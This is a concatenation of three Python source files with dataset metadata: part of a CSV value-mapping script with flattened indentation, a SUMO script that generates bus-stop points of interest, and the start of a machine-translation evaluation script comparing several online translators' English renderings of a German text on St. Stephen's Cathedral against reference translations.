codec = codecs.lookup(encoding)
msg = "Encoding '{}' found in Python's codec collection as '{}'"
print(msg.format(encoding, codec.name))
            except LookupError:
                print("Error: '" + encoding + "' not found in Python's " +
                      "codec collection. Either look for a valid name here " +
                      "(https://docs.python.org/2/library/codecs.html#standard-" +
                      "encodings) or omit this argument to enable automated " +
                      "guessing.")
sys.exit()
encs.append(encoding)
mask = None
if args.quotemask:
reduced = args.quotemask.replace("f", "").replace("t", "")
if len(reduced) > 0:
            print("Error: A quotemask may only contain the letters 't' and " +
                  "'f'!")
sys.exit()
mask = [True if x == "t" else False for x in args.quotemask]
source_header, source_content = oat.get_csv_file_content(args.source_file, enc=encs[0])
key_column_name = "column " + str(args.source_file_key_column)
value_column_name = "column " + str(args.source_file_value_column)
if source_header:
header = source_header[0]
key_column_name = header[args.source_file_key_column]
value_column_name = header[args.source_file_value_column]
msg = u"Creating mapping table ({} -> {}) for source file {}...".format(key_column_name, value_column_name, args.source_file)
oat.print_g(msg)
mapping_table = {}
ambiguous_keys = []
for line in source_content:
if line:
key = line[args.source_file_key_column]
if key == 'NA':
continue
value = line[args.source_file_value_column]
if key not in mapping_table:
mapping_table[key] = value
else:
if mapping_table[key] != value:
if not args.strict:
msg = u"WARNING: Replacing existing value '{}' for key '{}' with new value '{}'".format(mapping_table[key], key, value)
mapping_table[key] = value
oat.print_y(msg)
else:
if key not in ambiguous_keys:
ambiguous_keys.append(key)
if args.strict:
for key in ambiguous_keys:
del(mapping_table[key])
msg = u"INFO: Ambiguous key '{}' dropped from mapping table".format(key)
oat.print_b(msg)
oat.print_g("mapping table created, contains " + str(len(mapping_table)) + " entries")
target_header, target_content = oat.get_csv_file_content(args.target_file, enc=encs[1])
line_num = 0 if not target_header else 1
replace_msg = u"Line {}: Found matching key '{}', replaced old value '{}' by '{}'"
modified_content = []
for line in target_content:
key = line[args.target_file_key_column]
if key in mapping_table:
new_value = mapping_table[key]
old_value = line[args.target_file_value_column]
if old_value != new_value:
if len(old_value) == 0 or old_value == "NA":
line[args.target_file_value_column] = new_value
msg = replace_msg.format(line_num, key, old_value, new_value)
oat.print_g(msg)
else:
if args.force_overwrite:
line[args.target_file_value_column] = new_value
msg = replace_msg.format(line_num, key, old_value, new_value)
oat.print_y(msg)
modified_content.append(line)
line_num += 1
with open('out.csv', 'w') as out:
writer = oat.OpenAPCUnicodeWriter(out, mask, quote_rules, True)
writer.write_rows(target_header + modified_content)
if __name__ == '__main__':
main()
| 47.710692 | 143 | 0.597284 |
e921f3f27b44858abfbec8e666ca9339e64d1af4
| 1,908 |
py
|
Python
|
Co-Simulation/Sumo/sumo-1.7.0/tools/shapes/poi_at_stops.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 4 |
2020-11-13T02:35:56.000Z
|
2021-03-29T20:15:54.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/shapes/poi_at_stops.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 9 |
2020-12-09T02:12:39.000Z
|
2021-02-18T00:15:28.000Z
|
Co-Simulation/Sumo/sumo-1.7.0/tools/shapes/poi_at_stops.py
|
uruzahe/carla
|
940c2ab23cce1eda1ef66de35f66b42d40865fb1
|
[
"MIT"
] | 1 |
2020-11-20T19:31:26.000Z
|
2020-11-20T19:31:26.000Z
|
#!/usr/bin/env python
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2010-2020 German Aerospace Center (DLR) and others.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# https://www.eclipse.org/legal/epl-2.0/
# This Source Code may also be made available under the following Secondary
# Licenses when the conditions for such availability set forth in the Eclipse
# Public License 2.0 are satisfied: GNU General Public License, version 2
# or later which is available at
# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html
# SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later
# @file poi_at_stops.py
# @author Jakob Erdmann
# @date 2018-08-31
"""
Generates a PoI-file containing a PoI for each bus stop in the given net.
"""
from __future__ import absolute_import
from __future__ import print_function
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import sumolib.net # noqa
from sumolib.xml import parse # noqa
if len(sys.argv) < 2:
print("Usage: " + sys.argv[0] + " <NET> <STOPS>", file=sys.stderr)
sys.exit()
print("Reading net...")
net = sumolib.net.readNet(sys.argv[1])
stops = sys.argv[2]
print("Writing output...")
with open('pois.add.xml', 'w') as f:
f.write('<?xml version="1.0"?>\n')
f.write('<additional>\n')
for stop in parse(stops, 'busStop'):
lane = net.getLane(stop.lane)
pos = (float(stop.startPos) + float(stop.endPos)) / 2
xypos = sumolib.geomhelper.positionAtShapeOffset(lane.getShape(), pos)
lon, lat = net.convertXY2LonLat(xypos[0], xypos[1])
f.write(' <poi id="%s" type="%s" color="1,0,0" layer="100" lon="%s" lat="%s"/>\n' % (
stop.id, stop.name, lon, lat))
f.write('</additional>\n')
| 36.692308 | 96 | 0.689203 |
3aef051281f5976411fee95c029eafcddc32c493
| 63,307 |
py
|
Python
|
evaluation.py
|
hoelzlmanuel/online-translator-evaluation
|
52c83db6a3601f2888110e6bf4f23e95d052313f
|
[
"MIT"
] | null | null | null |
evaluation.py
|
hoelzlmanuel/online-translator-evaluation
|
52c83db6a3601f2888110e6bf4f23e95d052313f
|
[
"MIT"
] | null | null | null |
evaluation.py
|
hoelzlmanuel/online-translator-evaluation
|
52c83db6a3601f2888110e6bf4f23e95d052313f
|
[
"MIT"
] | null | null | null |
from nltk.translate.bleu_score import corpus_bleu
from nltk.translate.nist_score import corpus_nist
from nltk.translate.meteor_score import meteor_score
from nltk.translate.gleu_score import corpus_gleu
import re
from nltk.translate.ribes_score import corpus_ribes
from nltk.translate.chrf_score import corpus_chrf
from pyter import ter
from copy import deepcopy
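# Minimal sketch of how one system's entries below could be scored with
# corpus_bleu (whitespace tokenization is an assumption made here, not
# necessarily what the original evaluation used):
def demo_corpus_bleu(entries):
    hypotheses = [e["translation"].split() for e in entries]
    references = [[r.split() for r in e["references"]] for e in entries]
    return corpus_bleu(references, hypotheses)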
translations = {
"Amazon Translate":
[
{
"translation": "St. Stephen's Cathedral (originally cathedral and metropolitan church of St. Stephen and all Saints) on Vienna's Stephansplatz (district of Inner City) has been a cathedral since 1365 (seat of a cathedral chapter), since 1469/1479 cathedral (bishop's seat) and since 1723 Metropolitan Church of the Archbishop of Vienna",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic cathedral, also known as Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes referred to as the Austrian national sanctuary",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "Its name is Saint Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patrol is All Saints' Day",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 metres long and 34 metres wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the west facade, flanked by the two pagan towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "St. Stephen's Cathedral has four towers: the highest at 136.4 metres is the south tower, the north tower was not completed and is only 68 metres high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In former Austria-Hungary, no church could be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Immaculate Conception Cathedral in Linz was built two meters lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which form the main chime of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the north tower under a tower hood from the Renaissance period since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"DeepL":
[
{
"translation": "St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and All Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church (seat of a cathedral chapter) since 1365, a cathedral (bishop's seat) since 1469/1479 and a metropolitan church of the Archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic cathedral, also called Steffl by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "It is named after St. Stephen, the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patron saint is All Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 metres long and 34 metres wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the west façade, flanked by the two pagan towers, which are about 65 metres high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "In total, St. Stephen's Cathedral has four towers: the highest, at 136.4 metres, is the south tower; the north tower was not completed and is only 68 metres high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austro-Hungarian Empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Cathedral of the Assumption in Linz was built two metres lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "The south tower contains a total of 13 bells, eleven of which form the main peal of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era dome since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"Google Translate":
[
{
"translation": "St. Stephen's Cathedral (actually the cathedral and metropolitan church of St. Stephen and all the saints) on Vienna's Stephansplatz (Inner City district) has been the cathedral church (seat of a cathedral chapter) since 1365, the cathedral since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic cathedral, also known as Steffl for short by the Viennese, is a symbol of Vienna and is sometimes referred to as the Austrian national shrine",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "It is named after St. Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patronage is All Saints' Day",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The structure is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the west facade, flanked by the two heather towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "St. Stephen's Cathedral has a total of four towers: the highest at 136.4 meters is the south tower, the north tower was not completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Cathedral of the Conception of Mary in Linz was built two meters lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which form the main bell of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the north tower under a tower dome from the Renaissance period since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"Microsoft Translator":
[
{
"translation": "St. Stephen's Cathedral (actually cathedral and metropolitan church in St. Stephen and all saints) on Vienna's Stephansplatz (inner city district) has been a cathedral church (seat of a cathedral chapter) since 1365, a cathedral (bishop's seat) since 1723, and the Metropolitan Church of the Archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also known by the Viennese as Steffl, is considered a landmark of Vienna and is sometimes referred to as the Austrian national sanctuary",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "The name is given to St. Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patrozinium is All Saints' Day",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The structure is 107 metres long and 34 metres wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the western facade, flanked by the two heath towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "In total, St. Stephen's Cathedral has four towers: the highest one at 136.4 metres is the south tower, the north tower has not been completed and is only 68 metres high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary no church could be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Cathedral of the Nativity of the Virgin Mary in Linz was built two metres lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the south tower there are a total of 13 bells, eleven of which form the main bell of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower hood since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"ModernMT":
[
{
"translation": "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) at St. Stephen's Square (district Innere Stadt) has been the cathedral church (seat of a cathedral chapter) since 1365, cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also called Steffl by the Viennese, is considered a landmark of Vienna and is sometimes referred to as the Austrian National Shrine",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "It is named after St. Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second Patrocinium is All Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The building is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor from 1230/40 to 1263 are still preserved and form the western facade, flanked by the two heath towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "The St. Stephen's Cathedral has a total of four towers: the highest with 136.4 meters is the South Tower, the North Tower was not completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In the former Austria-Hungary, no church was allowed to be built higher than the South Tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Cathedral of the Conception of the Virgin Mary in Linz was built two metres lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The South Tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
"translation": "In the South Tower there are a total of 13 bells, eleven of which make up the main sound of St. Stephen's Cathedral",
"references": ["In the south tower there are a total of 13 bells, eleven of which make up the main bells of St. Stephen's Cathedral", "There are 13 bells located in the south tower, eleven of which form the main chime of St. Stephen's cathedral"]
},
{
"translation": "The Pummerin, the third largest freely vibrating church bell in Europe, has been in the North Tower under a Renaissance dome since 1957",
"references": ["The Pummerin, the third largest free-swinging rung church bell of Europe, is located in the north tower since 1957 beneath a dome from the Renaissance period", "The Pummerin, the third-largest free-swinging church bell in Europe, has been located in the north tower under a Renaissance-era tower dome since 1957"]
},
],
"PROMT.One":
[
{
"translation": "The St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and All Saints) at the Viennese St. Stephen's Square (Inner City District) has been a cathedral church (seat of a cathedral chapter) since 1365, cathedral (bishop's seat) since 1469/1479 and metropolitan church of the archbishop since 1723",
"references": ["St. Stephen's Cathedral (actually the Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Innere Stadt district) has been a cathedral church since 1365, a cathedral (bishop's see) since 1469/1479 and the metropolitan church of the Archbishop of Vienna since 1723", "St. Stephen's Cathedral (actually Cathedral and Metropolitan Church of St. Stephen and all Saints) on Vienna's Stephansplatz (Inner City district) has been a cathedral church since 1365, a cathedral (bishop's seat) since 1469/1479 and metropolitan church of the Archbishop of Vienna since 1723"]
},
{
"translation": "The Roman Catholic Cathedral, also called Steffl for short by the Viennese, is considered a landmark in Vienna and is sometimes referred to as the Austrian national sanctuary",
"references": ["The Roman Catholic cathedral, which is also called Steffl for short by the Viennese, is considered a landmark of Vienna and is also referred to as an Austrian national shrine", "The Roman Catholic cathedral, also called Steffl for short by the Viennese, is considered a landmark of Vienna and is sometimes also referred to as the Austrian national shrine"]
},
{
"translation": "The namesake is Saint Stephen, who is considered the first Christian martyr",
"references": ["The namesake is Saint Stephen, who is said to have been the first Christian martyr", "Saint Stephen, who is considered to be the first Christian martyr, is the namesake of the cathedral"]
},
{
"translation": "The second patrol is All Saints",
"references": ["The second patronal festival is All Saints' Day", "The second patronal festival is All Saints' Day"]
},
{
"translation": "The structure is 107 meters long and 34 meters wide",
"references": ["The building is 107 meters long and 34 meters wide", "The building is 107 metres long and 34 metres wide"]
},
{
"translation": "The cathedral is one of the most important Gothic buildings in Austria",
"references": ["The cathedral is one of the most important Gothic buildings in Austria", "The cathedral is one of the most important Gothic buildings in Austria"]
},
{
"translation": "Parts of the late Romanesque predecessor building from 1230/40 to 1263 are still preserved and form the western facade, flanked by the two pagan towers, which are about 65 meters high",
"references": ["Parts of the late Romanesque predecessor building dating back to 1230/40 until 1263 are still intact and make up the west facade, flanked by the two pagan towers which are around 65 meters tall", "Parts of the late Romanesque predecessor building from 1230/40 till 1263 are still intact and form the west facade, which is flanked by the two heathen towers that are approximately 65 metres high"]
},
{
"translation": "In total, St. Stephen's Cathedral has four towers: The highest tower at 136.4 meters is the south tower, the north tower has not been completed and is only 68 meters high",
"references": ["In total, St. Stephen's Cathedral has four towers: With a height of 136.4 meters, the tallest is the south tower, the north tower was never finished and is only 68 meters high", "In total, St. Stephen's cathedral has four towers: The highest one being the south tower with a height of 136.4 metres, the north tower was not completed and is only 68 metres high"]
},
{
"translation": "In former Austria-Hungary no church was allowed to be built higher than the south tower of St. Stephen's Cathedral",
"references": ["In former Austro-Hungary no church was allowed to be built taller than the south tower of St. Stephen's Cathedral", "In the former Austro-Hungarian empire, no church was allowed to be built higher than the south tower of St. Stephen's Cathedral"]
},
{
"translation": "For example, the Marian Conception Cathedral in Linz was built two metres lower",
"references": ["As an example, the Cathedral of the Immaculate Conception in Linz was built two meters lower", "For example, the New Cathedral in Linz was built two metres lower"]
},
{
"translation": "The South Tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four meters deep",
"references": ["The south tower is an architectural masterpiece of the time; in spite of its remarkable height the foundation is less than four meters deep", "The south tower is an architectural masterpiece of the time; despite its remarkable height, the foundation is less than four metres deep"]
},
{
